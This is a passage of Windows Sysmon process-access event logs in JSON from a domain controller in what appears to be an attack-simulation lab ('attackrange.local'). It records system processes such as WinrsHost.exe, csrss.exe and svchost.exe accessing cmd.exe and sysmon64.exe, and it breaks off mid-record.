{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4358,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.048\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-001017620600}\r\nSourceProcessId: 4800\r\nSourceThreadId: 5064\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-0010DB640600}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.048","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-001017620600}","SourceProcessId":"4800","SourceThreadId":"5064","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-0010DB640600}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4359,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.048\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-0010DB640600}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.048","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-0010DB640600}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4360,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4361,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4362,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4363,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4364,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4365,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4366,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 